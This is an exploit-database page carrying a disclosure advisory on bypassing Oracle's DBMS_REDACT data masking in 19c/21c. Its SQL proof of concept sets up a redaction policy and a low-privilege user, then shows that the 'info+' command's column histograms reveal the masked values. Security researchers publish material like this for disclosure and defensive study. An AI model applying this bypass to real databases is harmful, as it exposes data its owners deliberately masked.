0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle DBMS_REDACT Dynamic Data Masking Bypass Vulnerability
Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database system Product: Database Manufacturer: Oracle Affected Version(s): 19c,21c Tested Version(s): 19c,21c CVE Reference: N/A Author of Advisory: Emad Al-Mousa Overview: DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package. This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed. ************************************************** Proof of Concept (PoC): In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables. SQL> CREATE TABLE HR.TABLE2( COMPANY_NAME VARCHAR2(10 BYTE), REGION VARCHAR2(10 BYTE), SALES NUMBER(12), DIVISION_NAME VARCHAR2(12)); SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES); SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL'); SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL'); SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT'); SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING'); SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT'); SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL'); SQL> commit; I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2: sqlplus / as sysdba SQL> begin dbms_redact.add_policy( object_schema => 'HR', object_name => 'TABLE2', column_name => 'SALES', policy_name => 'REDACT_HR_SALES', function_type => DBMS_REDACT.FULL, expression => '1=1'); end;/ I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table: sqlplus / as sysdba SQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro; connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command: info+ HR.TABLE2; The histogram data for SALES column will show the actual vaules stored in the redacted column. Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only. ************************************************** References: https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852 https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/ Thanks,Emad # 0day.today [2024-06-27] #